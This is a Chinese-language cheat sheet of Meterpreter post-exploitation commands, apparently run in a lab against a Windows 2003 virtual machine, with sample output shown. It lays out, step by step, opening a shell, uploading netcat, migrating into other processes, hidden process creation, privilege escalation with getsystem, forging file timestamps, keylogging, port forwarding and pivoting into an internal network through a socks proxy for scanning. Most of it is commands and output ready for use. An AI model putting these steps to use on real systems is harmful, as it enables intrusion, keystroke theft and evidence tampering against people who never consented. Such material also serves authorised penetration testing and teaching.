meterpreter命令详解

基本命令:
background # 让meterpreter处于后台模式
sessions -i number # 与会话进行交互,number表示第n个session
quit # 退出会话
shell # 获得命令行

meterpreter > shell
Process 320 created.
Channel 1 created.
Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\桌面>

 

cat c:\\boot.ini # 查看文件内容
getwd # 查看当前工作目录 work directory
upload /root/Desktop/netcat.exe c:\\ # 上传文件到目标机上
download 0xfa.txt /root/Desktop/ # 下载文件到本机上
edit c:\\boot.ini # 编辑文件
search -d d:\\www -f web.config # search 文件
ps # 查看当前活跃进程
migrate pid # 将Meterpreter会话移植到进程数为pid的进程中

meterpreter > migrate 3552
[*] Migrating from 904 to 3552...
[*] Migration completed successfully.

execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
getpid # 获取当前进程的pid
kill pid # 杀死进程
getuid # 查看权限
sysinfo # 查看目标机系统信息,如机器名,操作系统等
getsystem #提权操作
timestompc:/a.doc -c “10/27/2015 14:22:11” #修改文件的创建时间

键盘记录:

meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
whoami <Return> dir <Return>
meterpreter > keyscan_stop
Stopping the keystroke sniffer...

端口转发:

meterpreter > portfwd add -l 4444 -p 3389 -r 172.16.100.131
[*] Local TCP relay created: 0.0.0.0:4444 <-> 172.16.100.131:3389

然后查看本地监听

root@kali-vincent:/usr/share/metasploit-framework/config# netstat -ano | grep 4444
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN off (0.00/0/0)

内网渗透pivot:

是meterpreter最常用的一种代理,可以轻松把你的机器代理到受害者内网环境。
在Windows2003虚拟机上新建一块网卡,然后选择主机模式,配置不同网段10.11.100.1,kali是访问不了这个网段的。

msf exploit(handler) > route add 10.11.100.1 255.255.255.0 3
[*] Route added
msf exploit(handler) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
10.11.100.1 255.255.255.0 Session 3

或者可以在meterpreter中直接添加路由

meterpreter > run autoroute -s 10.11.100.1
[*] Adding a route to 10.11.100.1/255.255.255.0...
[+] Added route to 10.11.100.1/255.255.255.0 via 172.16.100.131
[*] Use the -p option to list all active routes

这时候就可以使用其他的模块对内网进行渗透了,但是如果想要其他的应用可以访问到内网,这里使用auxiliary/server/socks4a模块,需要注意Proxychains不支持ICMP,所以在代理使用NMAP的时候需要使用 -sT -Pn参数。

msf auxiliary(smb_login) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > exploit
[*] Auxiliary module execution completed

[*] Starting the socks4a proxy server

然后看一下端口监听

root@kali-vincent:/usr/share/metasploit-framework/config# netstat -ano | grep 1080
tcp 0 0 0.0.0.0:1080 0.0.0.0:* LISTEN off (0.00/0/0)
vim /etc/proxychains.conf
添加socks4 127.0.0.1 1080

然后使用proxychains nmap -sS -v 10.11.100.1就可以对内网进行扫描了